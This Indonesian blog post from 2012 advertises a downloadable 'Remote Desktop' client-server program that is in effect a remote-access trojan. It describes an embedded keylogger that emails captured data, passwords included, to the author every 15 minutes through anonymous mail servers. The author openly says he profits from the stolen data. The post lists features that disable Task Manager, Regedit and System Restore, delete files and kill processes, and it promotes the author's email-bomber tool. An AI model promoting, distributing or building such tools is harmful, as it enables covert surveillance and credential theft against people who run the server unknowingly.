usaha berhasil

Ads 468x60px

Kamis, 22 Maret 2012

Remote Desktop Client-Server- Mengontrol Desktop Orang Lain

Aplikasi ini dibuat HANYA dengan tujuan pembelajaran mengenai Pemrograman Remote Desktop Client - Server, dengan sudut pandang dari sisi hitamnya. Karena disatu sisi terdapat fasilitas yang menguntungkan bagi si pemegang aplikasi Client namun disisi lain dapat merugikan orang yang komputernya berjalan aplikasi server.


Screenshot Client.exe setelah terkoneksi dengan Server.exe



Harap Diperhatikan bahwa semua bentuk kerugian pada anda atau kerugian pada pihak lain yang diakibatkan penggunaan program "REMOTE DESKTOP" ini, bukan merupakan tanggung jawab saya sebagai penyusun program. Semua bentuk kerugian tersebut sepenuhnya menjadi tanggung jawab anda yang menjalankan aplikasi "REMOTE DESKTOP". Jika anda tidak setuju dengan hal ini lebih baik jangan gunakan aplikasi ini dan hapus dari komputer anda melalui tombol "Clear Your PC" yang ada pada form login aplikasi "Client.exe".

Tetapi jika anda setuju, maka harus diingat bahwa jika aplikasi "Server" berjalan di komputer anda dan anda terhubung dengan internet serta jika website untuk mengirim email secara anonim dapat diakses serta Kontrol Check Untuk memperbolehkan pengiriman e-mail ke VBasicCode anda centang maka otomatis setiap 15 menit "server" akan mengirim informasi ke account email saya, sehingga saya dapat mengambil keuntungan dari hasil keylogger yang tertanam di "server".
HATI-HATI JANGAN SAMPAI SAYA MENGETAHUI PASSWOR ANDA!!!.

Aplikasi Ini Dibuat dan Di Coba Pada System Windows XP SP 2, kadang masih dijumpai Bugs yaitu, Bugs pada proses Pengiriman email yang kadang gagal kadang berhasil, hal ini disebabkan karena web yang dipilih untuk pengiriman secara anonim kadang tidak dapat diakses sehingga email dari server tidak terkirim. Untuk mengatasi hal ini maka download dan gunakan aplikasi emailbomber yang telah saya upload sebelumnya untuk mengetahui webserver yang memiliki fasilitas pengiriman e-mail Anonim. Jika telah mendapatkan webserver dengan fasilitas ini maka tulis secara lengkap alamat webserser tersebut ke dalam file "Webserver.txt" yang secara otomatis akan dihasilkan jika anda menjalankan "Client.exe".

>>Download Here<< Mamment 

Fitur
Fitur yang ada pada aplikasi ini adalah:
Cek IP Address
Otomtatis Kirim e-mail
Cek Pengiriman e-mail
Update WebServer e-mail Anonim
ScreenShot
Keylogger
Upload Download
Chating
Pesan Pop-Up
Shutdown, Restart, Log Off
Minimize Semua Window
Show Hide Start Button
Enable Disable Start Button
Ubah Resolusi Monitor
Balik Layar Monitor
Wallpaper
Screen Saver
Open Close CD-Rom
Disable Enable Task Manager
Disable Enable Regedit
Show Hide Taskbar
Show Hide Clock
Kunci File executable
Disable Enable System Restore
Ubah Owner
Ubah Organization
Show Hide Icon Desktop
Get Versi Windows
Open Directory
Delete
Remove
Empty
Kill
Run
Mouse
View Time Server
Timer Connect/DisConnect Internet
Timer Shutdown
Tweak Registry
Close Windows Process
Del Windows Process

Pada akhirnya saya ucapkan terimakasih telah sudi membaca dan memnggunakan aplikasi ini. Semoga bermanfaat dan menambah Pengetahuan.

Tidak ada komentar:

Posting Komentar

Angel From Heaven

 
Letakkan Kode Iklan sobat yg berukuran 120 x 600 disini!!!